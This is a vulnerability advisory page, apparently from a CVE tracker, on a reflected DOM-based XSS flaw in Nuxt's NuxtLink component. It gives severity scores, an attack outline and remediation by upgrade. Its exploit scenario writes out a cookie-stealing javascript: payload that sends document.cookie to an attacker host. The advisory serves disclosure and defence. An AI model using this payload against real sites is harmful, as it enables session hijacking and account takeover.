Skip to main content

Nuxt CVE-2026-53722

| EUVD-2026-36428 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-12 GitHub_M GHSA-934w-87qh-qr26
XSS Nuxt
5.1
CVSS 4.0 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
6.1 MEDIUM

Network-delivered XSS with no privileges required; S:C because script executes in the application's browser origin; UI:R for required victim click.

3.1 AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

3
Patch available
Jun 12, 2026 - 16:01 EUVD
Source Code Evidence Fetched
Jun 12, 2026 - 14:55 vuln.today
Analysis Generated
Jun 12, 2026 - 14:55 vuln.today

DescriptionCVE.org

Nuxt is an open-source web development framework for Vue.js. Prior to versions 3.21.7 and 4.4.7, <NuxtLink> did not validate the URL scheme of values bound to its to or href props before rendering them into the href attribute of the underlying <a> element. When an application binds attacker-controlled input (a query parameter, a CMS field, a user-supplied profile URL) to <NuxtLink :to> or :href, the attacker can supply a javascript: or vbscript: URL that is reflected verbatim into the rendered markup. Clicking the link executes the supplied script in the origin of the Nuxt application, resulting in reflected DOM-based cross-site scripting. A data:text/html,... payload reflected through the same sink does not execute in the application's origin but enables a same-tab phishing surface anchored to a legitimate application link. The same value was exposed to consumers of the component's custom slot via the href and route.href props, so applications that re-bind those values to their own anchors were affected identically. This issue has been patched in versions 3.21.7 and 4.4.7.

AnalysisAI

Reflected DOM-based XSS in Nuxt's built-in <NuxtLink> component allows an unauthenticated attacker to inject script-capable URLs (javascript:, vbscript:) that execute in the application's origin when a victim clicks a crafted link, affecting all Nuxt v3 versions prior to 3.21.7 and v4 versions prior to 4.4.7. Exploitation is contingent on application code that binds attacker-controlled input - such as query parameters, CMS link fields, or user-supplied profile URLs - directly to the component's to or href props without prior sanitization. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Identify Nuxt app binding untrusted URL to <NuxtLink> prop
Delivery
Submit javascript: or vbscript: payload as link value (CMS field, query param, profile URL)
Exploit
Application renders crafted href verbatim in <a> element
Install
Send victim a link to the affected page
C2
Victim clicks rendered anchor
Execute
Script executes in application origin
Impact
Exfiltrate session tokens or perform authenticated actions
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires that the target Nuxt application explicitly passes attacker-controlled input - originating from a query parameter, a user-supplied profile URL, a CMS-managed link field, or any other external data source - directly to the to or href prop of a <NuxtLink> component without prior scheme validation. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 5.1 (Medium, AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N) accurately characterizes the exploitability profile: the attack is network-reachable with no complexity or privilege requirements, but requires a victim to click the crafted link (UI:A), which meaningfully constrains mass exploitation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker identifies a Nuxt application that renders user-supplied profile URLs through <NuxtLink :to='user.profileUrl'> and submits javascript:fetch('https://attacker.example/c?d='+document.cookie) as their profile URL value stored in the application's CMS or user record. When an authenticated victim (such as an administrator reviewing user profiles) visits the page and clicks the rendered profile link, the script executes in the application's origin, exfiltrating the victim's session cookies or CSRF tokens to the attacker's server. …
Remediation The primary remediation is to upgrade to Nuxt 3.21.7 (v3 branch) or 4.4.7 (v4 branch), both of which include the sanitizeExternalHref() fix confirmed by patch commits at https://github.com/nuxt/nuxt/commit/0103ce06fbbbdfa079a7f020ef8ce00121eac4a3 and https://github.com/nuxt/nuxt/commit/53284043dc21210a25d629d1cec67d3ae557ffd0. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-53721 HIGH
8.8 Jun 12

Route-rule middleware bypass in Nuxt 3.11.0-3.21.6 and 4.0.0-4.4.6 allows remote attackers to evade routeRules-defined p
CVE-2026-49993 MEDIUM POC
5.9 Jun 12

Source code exfiltration in Nuxt's @nuxt/webpack-builder and @nuxt/rspack-builder (versions 3.15.4-3.21.6 and 4.0.0-alph

Share

CVE-2026-53722 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy